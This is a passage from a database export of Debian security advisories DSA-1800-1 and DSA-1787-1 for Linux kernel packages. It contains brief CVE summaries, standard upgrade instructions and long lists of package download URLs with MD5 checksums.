877afd2f578bcfe254d01dbd437c72a3\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-4kc-malta_2.6.26-15lenny2_mips.deb\n Size/MD5 checksum: 23319736 ab01e5fb78dc39389364a8284a9fafb8\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r4k-ip22_2.6.26-15lenny2_mips.deb\n Size/MD5 checksum: 255696 3208d45d1fa1d3bc56452e3715044bde\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1a-bcm91480b_2.6.26-15lenny2_mips.deb\n Size/MD5 checksum: 294846 4b8c8611ab3ced1936a21719d0db327e\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-mips_2.6.26-15lenny2_mips.deb\n Size/MD5 checksum: 103628 e305aec4b61ee60c5638c64cb85b5f89\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-15lenny2_mips.deb\n Size/MD5 checksum: 103572 ac8b9df04d63b2e077590e82a8676e6c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r5k-ip32_2.6.26-15lenny2_mips.deb\n Size/MD5 checksum: 280168 4462adb08ce8d26bf9856021b814d191\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-5kc-malta_2.6.26-15lenny2_mips.deb\n Size/MD5 checksum: 349818 e0e3ff2cb9251fca0729f347dfe5ecba\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r4k-ip22_2.6.26-15lenny2_mips.deb\n Size/MD5 checksum: 11427614 ab6594b40bf0ce9a73c0891ba9706cc3\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r5k-ip32_2.6.26-15lenny2_mips.deb\n Size/MD5 checksum: 15680942 6d69e713864dd57e7e5c52711ce65f8f\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-4kc-malta_2.6.26-15lenny2_mips.deb\n Size/MD5 checksum: 350770 02fc7e97009a310eab609b34824f0198\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-15lenny2_mips.deb\n Size/MD5 checksum: 754842 f4f4b879b7a9ff4efb024cf7c81e4c8e\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-4kc-malta_2.6.26-15lenny2_mipsel.deb\n Size/MD5 checksum: 22773614 2f02c916e762ec12aa5e6d940e6942ab\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-5kc-malta_2.6.26-15lenny2_mipsel.deb\n Size/MD5 checksum: 346140 f074d0b61aca2a022c1b23b2a9cb31d8\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-mipsel_2.6.26-15lenny2_mipsel.deb\n Size/MD5 checksum: 103708 7cbdf5c0f7d9091682225139e4019f4a\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-15lenny2_mipsel.deb\n Size/MD5 checksum: 739236 220a8b129147286703e70de980e70010\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1a-bcm91480b_2.6.26-15lenny2_mipsel.deb\n Size/MD5 checksum: 19378238 717d741afb1c4d6355bf2912e797b893\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1-bcm91250a_2.6.26-15lenny2_mipsel.deb\n Size/MD5 checksum: 19385536 c743a80e3ab91e52603517987059d062\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1-bcm91250a_2.6.26-15lenny2_mipsel.deb\n Size/MD5 checksum: 291996 72bd0ee79971f727a22e753de2a79dd2\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-15lenny2_mipsel.deb\n Size/MD5 checksum: 3887460 24f9ebab57d2f336ab2965d75ced8d04\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-15lenny2_mipsel.deb\n Size/MD5 checksum: 103656 7e5a9a9fe6b75f773f7109fdb29c67b2\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r5k-cobalt_2.6.26-15lenny2_mipsel.deb\n Size/MD5 checksum: 14885136 b97b282ee0e13f36a0e7ec7ac90fd698\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1a-bcm91480b_2.6.26-15lenny2_mipsel.deb\n Size/MD5 checksum: 291628 97184eef6ab6f4aba03c5756cf817e77\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-4kc-malta_2.6.26-15lenny2_mipsel.deb\n Size/MD5 checksum: 346368 9f65a85c3a36a98971295da9eca49ced\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r5k-cobalt_2.6.26-15lenny2_mipsel.deb\n Size/MD5 checksum: 287456 f836716afe5101b627b6d017ee2cf6e3\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-5kc-malta_2.6.26-15lenny2_mipsel.deb\n Size/MD5 checksum: 28242940 f848e64d548e0dc0655ff4a1e1efc263\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-15lenny2_powerpc.deb\n Size/MD5 checksum: 3852082 41b6543dcd37c140f2c468d7c7535eed\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc_2.6.26-15lenny2_powerpc.deb\n Size/MD5 checksum: 23112214 960c8cfb6b15c7cbaf6edd2d4aca9216\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-15lenny2_powerpc.deb\n Size/MD5 checksum: 103666 e2fd64d5aa6c1f98956e62b4a0260d0f\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-15lenny2_powerpc.deb\n Size/MD5 checksum: 3886868 44038a1babafe461e01dc987d84edf9a\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-powerpc64_2.6.26-15lenny2_powerpc.deb\n Size/MD5 checksum: 23389448 f1d0e1e6ed8b15a234c8023bc258149b\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc64_2.6.26-15lenny2_powerpc.deb\n Size/MD5 checksum: 370398 90e589b7dd6b6a5a2a1e29c204b0ed68\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-powerpc64_2.6.26-15lenny2_powerpc.deb\n Size/MD5 checksum: 370828 c556b7c5ed697ccf57eb6dee79279dfc\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-15lenny2_powerpc.deb\n Size/MD5 checksum: 752742 e8fa3ee09312887d1d11f32d123a50d9\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-powerpc_2.6.26-15lenny2_powerpc.deb\n Size/MD5 checksum: 364504 91840865ed1ed6cc06f7e4141ee9caf6\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-powerpc_2.6.26-15lenny2_powerpc.deb\n Size/MD5 checksum: 23548478 943ab35bb29eb5f16b065f31d98b0f10\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-powerpc_2.6.26-15lenny2_powerpc.deb\n Size/MD5 checksum: 103692 f69df040dc9fdf8e78517698c15a5550\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc-smp_2.6.26-15lenny2_powerpc.deb\n Size/MD5 checksum: 364426 9d91da2c31f69340de4f4fa30e5043ee\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc_2.6.26-15lenny2_powerpc.deb\n Size/MD5 checksum: 362742 f5cc256d09740470b319faa0acb0bbeb\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc64_2.6.26-15lenny2_powerpc.deb\n Size/MD5 checksum: 23341130 8b8bee292a27f65c68ccef929f472629\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc-smp_2.6.26-15lenny2_powerpc.deb\n Size/MD5 checksum: 23515268 8253e09f72830bc475e18382d77e790c\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390x_2.6.26-15lenny2_s390.deb\n Size/MD5 checksum: 226874 012f123cf2a0959a26b3842d4a01a288\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-s390x_2.6.26-15lenny2_s390.deb\n Size/MD5 checksum: 7829404 b2db1074fb1f2c946dec0e6e87ff5f92\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-15lenny2_s390.deb\n Size/MD5 checksum: 103648 850c0432d7d078b4626b3be6daab0a28\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390x_2.6.26-15lenny2_s390.deb\n Size/MD5 checksum: 7768546 35fc35b3b56e41cd84d43f2e77c0b22b\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-15lenny2_s390.deb\n Size/MD5 checksum: 3526832 fa2fb50fa267e35dd7d6800d99639256\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390_2.6.26-15lenny2_s390.deb\n Size/MD5 checksum: 226086 2c89451b2fc1bea70667cd0ff95dae91\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-15lenny2_s390.deb\n Size/MD5 checksum: 738472 31dc6942f679a420645a21e0fc0c35e0\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390_2.6.26-15lenny2_s390.deb\n Size/MD5 checksum: 7481500 e2375317ca3081bf63a3c97a5b935416\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390-tape_2.6.26-15lenny2_s390.deb\n Size/MD5 checksum: 1625802 5160bd9986a171955f3562b75cf354b2\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-s390x_2.6.26-15lenny2_s390.deb\n Size/MD5 checksum: 228190 5cabeeb5263a026a97facd0ea936b762\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-15lenny2_s390.deb\n Size/MD5 checksum: 3559308 e21511cdf0e9fcb7a252ab44d91b92eb\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-s390_2.6.26-15lenny2_s390.deb\n Size/MD5 checksum: 103670 3775b5b831d91e73aefaa4e75bfeb002\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-sparc_2.6.26-15lenny2_sparc.deb\n Size/MD5 checksum: 103590 d03c411c9501d10750608b9b79b0cf72\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-sparc64_2.6.26-15lenny2_sparc.deb\n Size/MD5 checksum: 14479456 98ceecd12b774a3ebb356191d62557a2\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-15lenny2_sparc.deb\n Size/MD5 checksum: 3777608 881e0091bbc2885b4affe78a9ae3b07a\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64_2.6.26-15lenny2_sparc.deb\n Size/MD5 checksum: 297472 1670872dd129ca10da89ef6c9661c460\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64_2.6.26-15lenny2_sparc.deb\n Size/MD5 checksum: 14134838 0225ead0cde1eacf5ac523da37a7a679\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-15lenny2_sparc.deb\n Size/MD5 checksum: 3812750 f0bb98ba845e2e1b6b196d8015a20718\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-sparc64_2.6.26-15lenny2_sparc.deb\n Size/MD5 checksum: 299968 ddc83f3902293f66791c1cc24345695c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64-smp_2.6.26-15lenny2_sparc.deb\n Size/MD5 checksum: 14459928 fc5eb9d5a238621723ecd3919946cbe9\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-15lenny2_sparc.deb\n Size/MD5 checksum: 795946 cb3b7cb116f72dd623a3ed8e7d53e3e3\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64-smp_2.6.26-15lenny2_sparc.deb\n Size/MD5 checksum: 298804 260d0051895126e78a28510075dc4898\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-15lenny2_sparc.deb\n Size/MD5 checksum: 103566 3d18d81d21f97f8cc79638cfa1ef0090\n\n These changes will probably be included in the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>", "cvss3": {}, "published": "2009-05-15T19:17:51", "type": "debian", "title": "[SECURITY] [DSA 1800-1] New Linux 2.6.26 packages fix several vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-0028", "CVE-2009-0834", "CVE-2009-0835", "CVE-2009-0859", "CVE-2009-1046", "CVE-2009-1072", "CVE-2009-1184", "CVE-2009-1192", "CVE-2009-1242", "CVE-2009-1265", "CVE-2009-1337", "CVE-2009-1338", "CVE-2009-1439"], "modified": "2009-05-15T19:17:51", "id": "DEBIAN:DSA-1800-1:C8938", "href": "https://lists.debian.org/debian-security-announce/2009/msg00111.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-26T15:55:32", "description": "- ----------------------------------------------------------------------\nDebian Security Advisory DSA-1787-1 security@debian.org\nhttp://www.debian.org/security/ Dann Frazier\nMay 2, 2009 http://www.debian.org/security/faq\n- ----------------------------------------------------------------------\n\nPackage : linux-2.6.24\nVulnerability : denial of service/privilege escalation/information leak\nProblem type : local/remote\nDebian-specific: no\nCVE Id(s) : CVE-2008-4307 CVE-2008-5079 CVE-2008-5395 CVE-2008-5700\n CVE-2008-5701 CVE-2008-5702 CVE-2009-0028 CVE-2009-0029\n CVE-2009-0031 CVE-2009-0065 CVE-2009-0269 CVE-2009-0322\n CVE-2009-0675 CVE-2009-0676 CVE-2009-0745 CVE-2009-0834\n CVE-2009-0859 CVE-2009-1046 CVE-2009-1192 CVE-2009-1242\n CVE-2009-1265 CVE-2009-1337 CVE-2009-1338 CVE-2009-1439\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a denial of service or privilege escalation. The Common\nVulnerabilities and Exposures project identifies the following\nproblems:\n\nCVE-2008-4307\n\n Bryn M. Reeves reported a denial of service in the NFS filesystem.\n Local users can trigger a kernel BUG() due to a race condition in\n the do_setlk function.\n\nCVE-2008-5079\n\n Hugo Dias reported a DoS condition in the ATM subsystem that can\n be triggered by a local user by calling the svc_listen function\n twice on the same socket and reading /proc/net/atm/*vc.\n\nCVE-2008-5395\n\n Helge Deller discovered a denial of service condition that allows\n local users on PA-RISC systems to crash a system by attempting to\n unwind a stack contiaining userspace addresses.\n\nCVE-2008-5700\n\n Alan Cox discovered a lack of minimum timeouts on SG_IO requests,\n which allows local users of systems using ATA to cause a denial of\n service by forcing drives into PIO mode.\n \nCVE-2008-5701\n\n Vlad Malov reported an issue on 64-bit MIPS systems where a local\n user could cause a system crash by crafing a malicious binary\n which makes o32 syscalls with a number less than 4000.\n\nCVE-2008-5702\n\n Zvonimir Rakamaric reported an off-by-one error in the ib700wdt\n watchdog driver which allows local users to cause a buffer\n underflow by making a specially crafted WDIOC_SETTIMEOUT ioctl\n call.\n\nCVE-2009-0028\n\n Chris Evans discovered a situation in which a child process can\n send an arbitrary signal to its parent.\n\nCVE-2009-0029\n\n Christian Borntraeger discovered an issue effecting the alpha,\n mips, powerpc, s390 and sparc64 architectures that allows local\n users to cause a denial of service or potentially gain elevated\n privileges.\n\nCVE-2009-0031\n\n Vegard Nossum discovered a memory leak in the keyctl subsystem\n that allows local users to cause a denial of service by consuming\n all of kernel memory.\n\nCVE-2009-0065\n\n Wei Yongjun discovered a memory overflow in the SCTP\n implementation that can be triggered by remote users, permitting\n remote code execution.\n \nCVE-2009-0269\n\n Duane Griffin provided a fix for an issue in the eCryptfs\n subsystem which allows local users to cause a denial of service\n (fault or memory corruption).\n\nCVE-2009-0322\n\n Pavel Roskin provided a fix for an issue in the dell_rbu driver\n that allows a local user to cause a denial of service (oops) by\n reading 0 byts from a sysfs entry.\n\nCVE-2009-0675\n\n Roel Kluin discovered inverted logic in the skfddi driver that\n permits local, unprivileged users to reset the driver statistics.\n\nCVE-2009-0676\n\n Clement LECIGNE discovered a bug in the sock_getsockopt function\n that may result in leaking sensitive kernel memory.\n\nCVE-2009-0745\n\n Peter Kerwien discovered an issue in the ext4 filesystem that\n allows local users to cause a denial of service (kernel oops)\n during a resize operation.\n\nCVE-2009-0834\n\n Roland McGrath discovered an issue on amd64 kernels that allows\n local users to circumvent system call audit configurations which\n filter based on the syscall numbers or argument details.\n\nCVE-2009-0859\n\n Jiri Olsa discovered that a local user can cause a denial of\n service (system hang) using a SHM_INFO shmctl call on kernels\n compiled with CONFIG_SHMEM disabled. This issue does not affect\n prebuilt Debian kernels.\n\nCVE-2009-1046\n\n Mikulas Patocka reported an issue in the console subsystem that\n allows a local user to cause memory corruption by selecting a\n small number of 3-byte UTF-8 characters.\n\nCVE-2009-1192\n\n Shaohua Li reported an issue in the AGP subsystem they may allow\n local users to read sensitive kernel memory due to a leak of\n uninitialized memory.\n\nCVE-2009-1242\n\n Benjamin Gilbert reported a local denial of service vulnerability\n in the KVM VMX implementation that allows local users to trigger\n an oops.\n\nCVE-2009-1265\n\n Thomas Pollet reported an overflow in the af_rose implementation\n that allows remote attackers to retrieve uninitialized kernel\n memory that may contain sensitive data.\n\nCVE-2009-1337\n\n Oleg Nesterov discovered an issue in the exit_notify function that\n allows local users to send an arbitrary signal to a process by\n running a program that modifies the exit_signal field and then\n uses an exec system call to launch a setuid application.\n\nCVE-2009-1338\n\n Daniel Hokka Zakrisson discovered that a kill(-1) is permitted to\n reach processes outside of the current process namespace.\n \nCVE-2009-1439\n\n Pavan Naregundi reported an issue in the CIFS filesystem code that\n allows remote users to overwrite memory via a long\n nativeFileSystem field in a Tree Connect response during mount.\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 2.6.24-6~etchnhalf.8etch1.\n\nWe recommend that you upgrade your linux-2.6.24 packages.\n\nNote: Debian 'etch' includes linux kernel packages based upon both the\n2.6.18 and 2.6.24 linux releases. All known security issues are\ncarefully tracked against both packages and both packages will receive\nsecurity updates until security support for Debian 'etch'\nconcludes. However, given the high frequency at which low-severity\nsecurity issues are discovered in the kernel and the resource\nrequirements of doing an update, lower severity 2.6.18 and 2.6.24\nupdates will typically release in a staggered or "leap-frog" fashion.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nOldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.8etch1.diff.gz\n Size/MD5 checksum: 4033829 ff5f9342fbd061dcab316080057bf9ac\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.8etch1.dsc\n Size/MD5 checksum: 5117 c71acfa6a187429a702d368e5974d082\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24.orig.tar.gz\n Size/MD5 checksum: 59630522 6b8751d1eb8e71498ba74bbd346343af\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-tree-2.6.24_2.6.24-6~etchnhalf.8etch1_all.deb\n Size/MD5 checksum: 82422 f39c24b3acf13eee80ab07421e120bc7\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-doc-2.6.24_2.6.24-6~etchnhalf.8etch1_all.deb\n Size/MD5 checksum: 4260850 8b0891fa602714572b2ea8be13d4b2eb\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-support-2.6.24-etchnhalf.1_2.6.24-6~etchnhalf.8etch1_all.deb\n Size/MD5 checksum: 96802 317936645be453126afab54705999059\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-manual-2.6.24_2.6.24-6~etchnhalf.8etch1_all.deb\n Size/MD5 checksum: 1542086 460bc638a040b2674f4da6e30fc975f1\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-source-2.6.24_2.6.24-6~etchnhalf.8etch1_all.deb\n Size/MD5 checksum: 46865722 b3afc19906294f1990ab97e6c8943285\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-patch-debian-2.6.24_2.6.24-6~etchnhalf.8etch1_all.deb\n Size/MD5 checksum: 917482 dc533207197184a44dcc931372534b0b\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-alpha_2.6.24-6~etchnhalf.8etch1_alpha.deb\n Size/MD5 checksum: 82038 12269f5ccc3251bed6544c82ace6bab8\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-legacy_2.6.24-6~etchnhalf.8etch1_alpha.deb\n Size/MD5 checksum: 26736698 8714134f74ad24d4a761d9e1b18c84dc\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-smp_2.6.24-6~etchnhalf.8etch1_alpha.deb\n Size/MD5 checksum: 332080 2632341b6c0d98b6798103d4e03a4980\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-generic_2.6.24-6~etchnhalf.8etch1_alpha.deb\n Size/MD5 checksum: 26757530 c00a3280cf8bc9d18e52c64202af9e34\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-smp_2.6.24-6~etchnhalf.8etch1_alpha.deb\n Size/MD5 checksum: 27341904 ee355aab70b9061c511e7152929c150a\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-generic_2.6.24-6~etchnhalf.8etch1_alpha.deb\n Size/MD5 checksum: 331054 7d30fb320e409180de47bdf7be8430c2\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch1_alpha.deb\n Size/MD5 checksum: 3454072 01417e58c71bb9515a4011c390be0580\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch1_alpha.deb\n Size/MD5 checksum: 82010 cff77bfb7491d357acc7d9d50dc0217e\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-legacy_2.6.24-6~etchnhalf.8etch1_alpha.deb\n Size/MD5 checksum: 330926 1b2c38a3628e25cc62b7e555800d48e5\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.8etch1_amd64.deb\n Size/MD5 checksum: 19480638 9f9f06adb37a611ed3f24000859beb03\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch1_amd64.deb\n Size/MD5 checksum: 3654580 aac989a8eee05d7adaf9731dfdda062f\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.8etch1_amd64.deb\n Size/MD5 checksum: 344960 4a6f4ac493086ec243734b3b6968a2bd\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-amd64_2.6.24-6~etchnhalf.8etch1_amd64.deb\n Size/MD5 checksum: 82010 f7713fceebf11933dd20c7db1c636df0\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch1_amd64.deb\n Size/MD5 checksum: 81998 7f2d31a9d80ae34c397d90912dbbb46f\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-ixp4xx_2.6.24-6~etchnhalf.8etch1_arm.deb\n Size/MD5 checksum: 308926 05539199c8e837c4fccc75172a9c82be\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch1_arm.deb\n Size/MD5 checksum: 82136 39e67aa9c8617379a54c9f36d0d72572\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch1_arm.deb\n Size/MD5 checksum: 3939598 804e621a444954f2045f27a9282ae77a\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-iop32x_2.6.24-6~etchnhalf.8etch1_arm.deb\n Size/MD5 checksum: 306808 3086d994c254c2481c6610729c6ee182\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-footbridge_2.6.24-6~etchnhalf.8etch1_arm.deb\n Size/MD5 checksum: 296510 23d73ccad75398f169ad602db513b908\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-footbridge_2.6.24-6~etchnhalf.8etch1_arm.deb\n Size/MD5 checksum: 9351566 c0326566806f5c7ed8de2342f4de857a\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-ixp4xx_2.6.24-6~etchnhalf.8etch1_arm.deb\n Size/MD5 checksum: 10775966 6661bd851503d953c4ca43b6f8e85deb\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-iop32x_2.6.24-6~etchnhalf.8etch1_arm.deb\n Size/MD5 checksum: 10768304 daca396e0f5decdfe92a7724069daa50\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-arm_2.6.24-6~etchnhalf.8etch1_arm.deb\n Size/MD5 checksum: 82166 8bb034ce3157aeefe7c3c692ebe14df4\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc64-smp_2.6.24-6~etchnhalf.8etch1_hppa.deb\n Size/MD5 checksum: 261644 7c1852bbe840ac3d90c12d452e2681cf\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch1_hppa.deb\n Size/MD5 checksum: 82016 293d2bba2cb8563e700377ada35f2ba2\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc-smp_2.6.24-6~etchnhalf.8etch1_hppa.deb\n Size/MD5 checksum: 259304 f3db74269efbac5501598e35a462bf20\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-hppa_2.6.24-6~etchnhalf.8etch1_hppa.deb\n Size/MD5 checksum: 82038 bdae604446c924296cd1aac5b9be7e95\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc_2.6.24-6~etchnhalf.8etch1_hppa.deb\n Size/MD5 checksum: 13332816 5d9819ffa069392df46ad94e193cbdf1\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc_2.6.24-6~etchnhalf.8etch1_hppa.deb\n Size/MD5 checksum: 258452 c1a9dde9f1c92b4563126d1937d4eec2\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc64_2.6.24-6~etchnhalf.8etch1_hppa.deb\n Size/MD5 checksum: 14385162 6cbd8dc0702e5cb15237d246883dd2c0\n 